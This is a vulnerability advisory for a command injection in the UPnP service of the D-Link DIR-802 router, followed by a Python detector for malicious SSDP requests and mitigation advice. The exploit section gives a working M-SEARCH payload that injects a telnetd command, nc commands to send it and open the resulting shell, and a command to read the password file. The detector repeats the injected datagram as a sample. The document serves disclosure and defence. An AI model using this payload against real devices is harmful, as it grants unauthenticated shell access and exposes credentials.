CVE-2021-29379 D-Link DIR-802 UPnP M-SEARCH Command Injection Vulnerability

Introduction

Authentication can be bypassed on the D-Link DIR-802 A1 by injecting a shell command into the Search Target (ST) field of an SSDP M-SEARCH discover packet; the router passes the ST value to a shell, so the injected command runs on the device without any credentials.

Exploit

Create a text file (payload.txt) containing the SSDP M-SEARCH request below. The ST field carries the injected command, which starts a telnet service on port 1234.

M-SEARCH * HTTP/1.1
HOST:192.168.0.1:1900
ST:urn:schemas-upnp-org:service:WANIPConnection:1;telnetd -p 1234
MX:2
MAN:"ssdp:discover"

Send the payload to the UPnP service on UDP port 1900 using nc.

nc -u 192.168.0.1 1900 < payload.txt


Connect to the telnet service on TCP port 1234.

nc -v 192.168.0.1 1234

Read the credentials from the file /var/passwd.

cat /var/passwd
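The steps above show that the only thing separating a normal discovery request from an exploit is the content of the ST header. The following detection helper is an added example, not code from the advisory or from D-Link: it parses the header block of an SSDP datagram and flags M-SEARCH requests whose ST value contains shell metacharacters or does not fit the search-target shapes UPnP defines (the allowed-pattern regex is my approximation of those shapes, and the sample datagrams are constructed, with the injected one reproducing the request shown above).

```python
"""Flag command-injection attempts in SSDP M-SEARCH requests.

Added example (not from the original advisory). The ST grammar below is an
approximation of the search-target forms in the UPnP Device Architecture
(ssdp:all, upnp:rootdevice, uuid:..., urn:...:device:... and urn:...:service:...),
not an exhaustive implementation.
"""
import re

# Search-target shapes a legitimate M-SEARCH may carry (assumption: approximate).
ST_ALLOWED = re.compile(
    r"^(ssdp:all|upnp:rootdevice|uuid:[A-Za-z0-9-]+"
    r"|urn:[A-Za-z0-9.-]+:(device|service):[A-Za-z0-9._-]+:[A-Za-z0-9.-]+)$"
)

# Characters a shell interprets; none of them is legal inside a UPnP ST value.
SHELL_META = re.compile(r"[;&|`$()<>\n\r\\'\"]")


def parse_ssdp(datagram):
    """Return (request_line, headers) for one SSDP datagram.

    Header names are upper-cased so ST, St and st are treated alike; parsing
    stops at the first blank line, which terminates the SSDP header block.
    """
    text = datagram.decode("utf-8", errors="replace")
    lines = text.split("\r\n") if "\r\n" in text else text.splitlines()
    request_line = lines[0].strip() if lines else ""
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().upper()] = value.strip()
    return request_line, headers


def inspect_msearch(datagram):
    """Return a list of findings for an M-SEARCH datagram (empty if clean).

    Non-M-SEARCH traffic (NOTIFY, responses) is ignored so the check can sit
    on a UDP/1900 tap without producing noise.
    """
    request_line, headers = parse_ssdp(datagram)
    findings = []
    if not request_line.startswith("M-SEARCH"):
        return findings
    st = headers.get("ST")
    if st is None:
        findings.append("missing ST header")
        return findings
    if SHELL_META.search(st):
        findings.append("shell metacharacter in ST: %r" % st)
    elif not ST_ALLOWED.match(st):
        findings.append("ST does not match UPnP search-target grammar: %r" % st)
    return findings


# Constructed sample datagrams.
BENIGN = (
    b"M-SEARCH * HTTP/1.1\r\n"
    b"HOST:239.255.255.250:1900\r\n"
    b'MAN:"ssdp:discover"\r\n'
    b"MX:2\r\n"
    b"ST:urn:schemas-upnp-org:service:WANIPConnection:1\r\n"
    b"\r\n"
)

# The request from the advisory above, with the injected command in ST.
INJECTED = (
    b"M-SEARCH * HTTP/1.1\n"
    b"HOST:192.168.0.1:1900\n"
    b"ST:urn:schemas-upnp-org:service:WANIPConnection:1;telnetd -p 1234\n"
    b"MX:2\n"
    b'MAN:"ssdp:discover"\n'
)

if __name__ == "__main__":
    for label, pkt in (("benign", BENIGN), ("injected", INJECTED)):
        print(label, inspect_msearch(pkt) or ["ok"])
```

The helper works on a single datagram, so it can be called from a packet capture loop or a UDP/1900 listener on a monitoring host. Because the flaw is reachable by anyone who can deliver a datagram to port 1900, the usual mitigations alongside detection are to block UDP/1900 at the network edge and to disable UPnP on affected devices until patched firmware is applied.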

